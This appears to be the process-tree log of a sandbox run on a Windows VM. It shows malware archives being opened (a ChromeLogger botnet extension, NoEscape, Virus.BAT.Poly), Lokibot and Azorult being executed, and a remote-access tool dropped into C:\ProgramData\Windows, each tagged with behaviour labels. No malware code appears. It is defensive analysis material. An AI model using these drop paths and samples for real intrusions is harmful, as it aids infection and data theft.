C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.8.640210574\766935325" -childID 8 -isForBrowser -prefsHandle 3656 -prefMapHandle 4812 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {12a44815-b9d5-4129-8fe5-258a828ff557} 4688 tab3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2124 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.9.1516444663\101273698" -childID 9 -isForBrowser -prefsHandle 4288 -prefMapHandle 4076 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a51fd3c3-385b-4734-bb13-c0c7afa55147} 4688 tab3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2716 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.10.1376230517\591675101" -childID 10 -isForBrowser -prefsHandle 3264 -prefMapHandle 5108 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {e329c6b8-c478-4799-9ebb-51ba9e96a721} 4688 tab3⤵
- Executes dropped EXE
PID:5896 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.11.1487429596\1724675316" -childID 11 -isForBrowser -prefsHandle 4864 -prefMapHandle 4268 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {1f9f32e9-c98f-41b1-a1c2-79872497f99e} 4688 tab3⤵
- Executes dropped EXE
PID:1140 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.12.967060710\744376020" -childID 12 -isForBrowser -prefsHandle 4976 -prefMapHandle 3608 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ed6de742-ddbe-4b0a-b83a-35fcfd2da1dc} 4688 tab3⤵
- Executes dropped EXE
PID:1692 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.13.1919265978\770184582" -childID 13 -isForBrowser -prefsHandle 1304 -prefMapHandle 4876 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {01e76152-33fd-4dff-8372-e037df18e2c5} 4688 tab3⤵
- Executes dropped EXE
PID:4276 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.14.49645393\805684887" -childID 14 -isForBrowser -prefsHandle 4032 -prefMapHandle 4060 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {5607b256-a258-44f6-894c-ca0493ee2dde} 4688 tab3⤵
- Executes dropped EXE
PID:5812
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4132
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5132
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\extension\js\background.js"1⤵PID:3468
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\extension\js\jquery-3.5.1.min.js"1⤵PID:984
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\extension\js\logger.js"1⤵PID:2984
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5428 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\extension\manifest.json"2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
PID:4628 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵PID:5876
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=35927EAF8329BE2E314F1C8C24254475 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=35927EAF8329BE2E314F1C8C24254475 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:14⤵PID:2856
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=95981AB388F46DF402CC7CA16E32625B --mojo-platform-channel-handle=1684 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:5740
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AFC138692A3948AFDB414F7EB096D0BE --mojo-platform-channel-handle=2320 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:4796
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1DBE671620EB936910FBB2F52B05142E --mojo-platform-channel-handle=2440 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:1308
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EFC5D60FF119B481E904994ECA58166D --mojo-platform-channel-handle=2344 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:2792
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DE827111092AF8A1D328528783C221B1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DE827111092AF8A1D328528783C221B1 --renderer-client-id=8 --mojo-platform-channel-handle=2400 --allow-no-sandbox-job /prefetch:14⤵PID:4132
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1012
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
PID:6048 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\README.md2⤵
- Opens file in notepad (likely ransom note)
PID:5400
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\server\bootstrap\css\bootstrap.css1⤵
- Opens file in notepad (likely ransom note)
PID:1720
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:5256 -
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\Javascript.Kaoom.Unknown.7z"2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:5368
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:5352 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Virus.BAT.Poly.7z"2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
PID:2124 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵PID:1672
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=978CEFCA38529EE5A2B2F1F6F578BA22 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:3252
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D570BB93F4CD7E215CD35A597C33FA83 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D570BB93F4CD7E215CD35A597C33FA83 --renderer-client-id=2 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:14⤵PID:4512
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=70228DA35FE3209CCAF029684FC53BCE --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:4360
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A7EE57BC473C93BBFCD20A1A4B81DE86 --mojo-platform-channel-handle=2400 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:3060
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EF81F8133A31102925AA46E38AFE9188 --mojo-platform-channel-handle=1964 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:5400
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A82190EB0C6FCD8DD4A4C267254B09E0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A82190EB0C6FCD8DD4A4C267254B09E0 --renderer-client-id=8 --mojo-platform-channel-handle=2416 --allow-no-sandbox-job /prefetch:14⤵PID:4976
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3064 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.exe_Virus-main.zip\NoEscape.exe_Virus-main\README.md"2⤵
- Checks processor information in registry
PID:6104
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
PID:2524 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7246C9F981C5ABB3C1F74DE46D2B80BB C2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:5596
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
PID:3876
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
PID:1556 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵PID:5612
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Suspicious behavior: SetClipboardViewer
PID:3980 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:5304
-
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"1⤵PID:2416
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"1⤵PID:3316
-
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"1⤵
- Suspicious use of SetThreadContext
PID:1044 -
